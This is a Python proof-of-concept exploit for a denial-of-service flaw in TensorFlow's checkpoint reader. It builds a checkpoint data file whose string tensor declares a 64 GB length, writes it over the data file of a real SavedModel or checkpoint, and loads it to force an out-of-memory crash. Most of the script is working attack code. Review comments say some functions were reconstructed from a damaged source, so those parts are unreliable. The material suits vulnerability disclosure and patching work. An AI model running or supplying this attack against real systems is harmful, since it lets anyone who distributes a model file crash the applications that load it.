#!/usr/bin/env python3
"""
PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS
=================================================================

CVE: TBD
Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc
Trigger: tf.saved_model.load() or tf.train.load_checkpoint()

Vulnerability:
  ReadStringTensor() reads varint64 string_lengths from attacker-controlled
  checkpoint data files. No validation that individual string_length values
  or their sum are bounded by entry.size(). Attacker can craft a checkpoint
  where a string tensor with shape [1] declares a single string of 64GB,
  causing immediate OOM crash via tstring::resize().

  CRC32 checksums are NOT a security boundary — the attacker controls both
  the data file content AND the crc32c field in BundleEntryProto metadata.

Root Cause:
  tensor_bundle.cc:151-159 — ReadStringTensor() inner loop:
    buffer->resize(string_length);   // string_length from attacker varint64
    ReadNBytes(string_length, ...);  // reads from file

  No check: sum(string_lengths[i]) <= entry.size() - overhead
  No check: individual string_length <= entry.size()

Impact:
  - Process crash (OOM / std::terminate) on loading malicious SavedModel
  - Denial of service for any application using tf.saved_model.load()
  - No authentication required — victim just needs to load a model file

Additionally affected: ReadVariantTensor() at line 188 (same pattern).
GetValue() has NO size validation at all for DT_VARIANT tensors (line 998).
"""

import os
import sys
import struct
import tempfile
import shutil

# Declared length of the single string element: 2**36 bytes (64 GB).
MALICIOUS_STRING_LENGTH = 0x1000000000

_UINT64_MAX = 0xFFFFFFFFFFFFFFFF


def encode_varint64(value):
    """Encode an integer as a protobuf varint64.

    Args:
        value: Integer in the unsigned 64-bit range.

    Returns:
        The base-128 little-endian varint encoding as ``bytes``.

    Raises:
        ValueError: If *value* is negative or does not fit in 64 bits.
            (A negative value would otherwise be emitted as one bogus byte.)
    """
    if not 0 <= value <= _UINT64_MAX:
        raise ValueError(f"varint64 value out of range: {value!r}")
    result = bytearray()
    while value > 0x7F:
        # Low 7 bits plus the continuation flag.
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value & 0x7F)
    return bytes(result)


def encode_fixed32(value):
    """Encode as little-endian uint32."""
    return struct.pack('<I', value)


# NOTE(review): everything from here down to mask_crc32c()'s return
# expression was missing from the damaged source and has been reconstructed
# (function names included). Confirm against the original script.
def _build_crc32c_table():
    """Build the 256-entry lookup table for reflected CRC-32C (Castagnoli)."""
    table = []
    for byte in range(256):
        crc = byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x82F63B78 if crc & 1 else crc >> 1
        table.append(crc)
    return tuple(table)


_CRC32C_TABLE = _build_crc32c_table()


def crc32c(data, crc=0):
    """Return the CRC-32C of *data*, optionally extending a previous *crc*."""
    crc ^= 0xFFFFFFFF
    for byte in data:
        crc = _CRC32C_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def mask_crc32c(crc):
    """Apply the rotate-and-add CRC mask (rotate right 15 bits, add delta)."""
    kMaskDelta = 0xa282ead8
    # Bits shifted above bit 31 are discarded by the final 32-bit mask.
    return (((crc >> 15) | (crc << 17)) + kMaskDelta) & 0xFFFFFFFF


def create_malicious_checkpoint_data():
    """
    Create the raw data bytes for a DT_STRING tensor with shape [1].

    The data file format for string tensors:
      [varint64 string_length_0] ... [varint64 string_length_N-1]
      [uint32 length_checksum]
      [string_data_0] ... [string_data_N-1]

    We encode string_length_0 = 0x1000000000 (64GB) — causes OOM on resize().

    Returns:
        A ``(data, crc)`` tuple: the data-file bytes and a 32-bit checksum
        value that callers only display.
    """
    # 64 GB string length — way more than any system can allocate
    malicious_length = MALICIOUS_STRING_LENGTH

    # Encode the string length as varint64
    length_bytes = encode_varint64(malicious_length)

    # Compute CRC32C of the length (as uint64 in memory, not varint bytes)
    # TF checksums the in-memory uint64 representation, not the varint encoding
    length_as_uint64 = struct.pack('<Q', malicious_length)

    # NOTE(review): the remainder of this function was missing from the
    # damaged source. The layout follows the docstring above; the exact
    # expression used for the returned checksum is an assumption — confirm.
    length_checksum = mask_crc32c(crc32c(length_as_uint64))
    data = length_bytes + encode_fixed32(length_checksum)
    overall_crc = mask_crc32c(crc32c(data))
    return data, overall_crc


def demo_vulnerability_analysis():
    """Print a textual walkthrough of the issue; TensorFlow is not required."""
    # NOTE(review): the heading and the first lines of the C++ excerpt were
    # missing from the damaged source and are reconstructed — confirm wording.
    print("VULNERABLE CODE: ReadStringTensor (tensor_bundle.cc:151-159)")
    print("-" * 50)
    print("""
  for (size_t i = 0; i < num_elements; ++i) {
    const uint64 string_length = string_lengths[i];
    tstring* buffer = &destination[i];
    buffer->resize(string_length);  // <-- UNBOUNDED ALLOCATION
    size_t bytes_read = 0;
    TF_RETURN_IF_ERROR(
        buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read));
  }
""")

    print("ATTACK SCENARIO:")
    print("-" * 50)
    print("""
  1. Attacker crafts a SavedModel with a DT_STRING variable
  2. In the checkpoint data file, the varint64 string_length = 64GB
  3. CRC32C checksum in BundleEntryProto.crc32c is set correctly
     (attacker controls both data and metadata — CRC is not a security check)
  4. Victim loads model: tf.saved_model.load('malicious_model/')
  5. BundleReader::Lookup() → GetValue() → ReadStringTensor()
  6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH
""")

    print("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)")
    print("-" * 50)
    print("""
  string buffer;
  buffer.resize(string_length);  // <-- SAME UNBOUNDED ALLOCATION

  GetValue() has NO size validation for DT_VARIANT (line 998-1009).
  For DT_STRING, the "lower_bound" check is too weak:
    lower_bound = NumElements (e.g., 1 for shape [1])
    entry.size() just needs to be >= 1 — trivially satisfied.
""")

    print("MALICIOUS DATA FILE CONSTRUCTION:")
    print("-" * 50)
    data, crc = create_malicious_checkpoint_data()
    print(f"  Data file size: {len(data)} bytes")
    print("  Encoded varint64 string_length: 0x1000000000 (64 GB)")
    print(f"  Overall CRC32C: 0x{crc:08X}")
    print(f"  Data hex dump: {data[:32].hex()}")
    print()

    # Show the varint encoding
    varint = encode_varint64(MALICIOUS_STRING_LENGTH)
    print(f"  Varint64 encoding of 64GB: {varint.hex()} ({len(varint)} bytes)")
    print()


def _import_tensorflow():
    """Return the ``tensorflow`` module, or ``None`` when it is not installed."""
    try:
        import tensorflow as tf
    except ImportError:
        print("[!] TensorFlow not installed. Running analysis-only mode.")
        return None
    return tf


def poc_with_tensorflow():
    """
    Full PoC that creates and loads a malicious checkpoint.
    Requires TensorFlow installed.

    Returns:
        True when the load attempt was made; False when TensorFlow is not
        installed or no data file was found. The caller is responsible for
        falling back to the textual analysis on False, so that it is printed
        once rather than twice.
    """
    tf = _import_tensorflow()
    if tf is None:
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating legitimate SavedModel with string variable...")

    tmpdir = tempfile.mkdtemp(prefix="tf_poc_")
    model_dir = os.path.join(tmpdir, "saved_model")

    try:
        # Step 1: Create a legitimate SavedModel with a string variable
        class SimpleModule(tf.Module):
            def __init__(self):
                self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var")

            @tf.function(input_signature=[])
            def get_value(self):
                return self.v

        module = SimpleModule()
        tf.saved_model.save(module, model_dir)
        print(f"[+] Saved legitimate model to: {model_dir}")

        # Step 2: Find and patch the data file
        var_dir = os.path.join(model_dir, "variables")
        # Sorted so the chosen shard does not depend on directory order.
        data_files = sorted(
            f for f in os.listdir(var_dir) if f.startswith("variables.data")
        )
        if not data_files:
            print("[-] No data files found!")
            return False

        data_path = os.path.join(var_dir, data_files[0])
        print(f"[*] Data file: {data_path}")

        with open(data_path, 'rb') as f:
            original_data = f.read()
        print(f"[*] Original data file size: {len(original_data)} bytes")

        # Step 3: Create malicious data file
        # For a shape [1] string tensor, the data format is:
        # [varint64 string_length_0][uint32 length_crc][string_bytes]
        malicious_data, _ = create_malicious_checkpoint_data()

        with open(data_path, 'wb') as f:
            f.write(malicious_data)
        print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)")
        print("[*] Malicious string_length = 64 GB (0x1000000000)")

        # Note: We also need to update the .index file's BundleEntryProto
        # to match the new data size and CRC. For a full exploit, the index
        # file would also be crafted. This simplified PoC demonstrates the
        # concept — the CRC mismatch will be caught but the allocation
        # happens BEFORE the CRC check.

        # Step 4: Attempt to load — should crash or OOM
        print()
        print("[!] Attempting to load malicious model...")
        print("[!] Expected: OOM crash or std::terminate")
        print()

        try:
            tf.saved_model.load(model_dir)
            print("[-] Load succeeded unexpectedly")
        except Exception as e:
            # Deliberately broad: any Python-level failure is reported here.
            print(f"[+] Exception caught: {type(e).__name__}: {e}")

        # Note: if the process crashes with SIGKILL (OOM killer) or
        # std::terminate, this exception handler won't be reached.
        # That's the DoS — the process dies.
        return True
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)


def poc_direct_checkpoint():
    """
    Alternative PoC using direct checkpoint loading (simpler trigger).

    Returns:
        True when the restore attempt was made; False when TensorFlow is not
        installed or no data file was found (the caller then falls back to
        the textual analysis).
    """
    tf = _import_tensorflow()
    if tf is None:
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating checkpoint with string variable...")

    tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_")
    ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt")

    try:
        # Create legitimate checkpoint
        v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var")
        ckpt = tf.train.Checkpoint(var=v)
        save_path = ckpt.save(ckpt_prefix)
        print(f"[+] Saved checkpoint: {save_path}")

        # Find data file
        data_files = sorted(f for f in os.listdir(tmpdir) if '.data-' in f)
        if not data_files:
            print("[-] No data files found!")
            return False

        data_path = os.path.join(tmpdir, data_files[0])

        # Patch with malicious string length
        malicious_data, _ = create_malicious_checkpoint_data()
        with open(data_path, 'wb') as f:
            f.write(malicious_data)

        print("[*] Patched data file with 64GB string_length")
        print("[!] Loading malicious checkpoint...")

        try:
            v2 = tf.Variable([""], dtype=tf.string, name="vuln_var")
            ckpt2 = tf.train.Checkpoint(var=v2)
            ckpt2.restore(save_path)
            print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}")
        except Exception as e:
            # Deliberately broad: any Python-level failure is reported here.
            print(f"[+] Exception: {type(e).__name__}: {e}")

        return True
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)


def main(argv=None):
    """Command-line entry point.

    Args:
        argv: Argument list to inspect; defaults to ``sys.argv``.
            ``--analysis`` prints the write-up only, ``--checkpoint`` runs
            the direct-checkpoint PoC, anything else runs the SavedModel PoC.
            Either PoC falls back to the write-up when it cannot run.
    """
    argv = sys.argv if argv is None else argv

    print("TensorFlow Checkpoint String Tensor DoS PoC")
    print("=" * 50)
    print()

    if "--analysis" in argv:
        demo_vulnerability_analysis()
        return

    poc = poc_direct_checkpoint if "--checkpoint" in argv else poc_with_tensorflow
    if not poc():
        demo_vulnerability_analysis()


if __name__ == "__main__":
    main()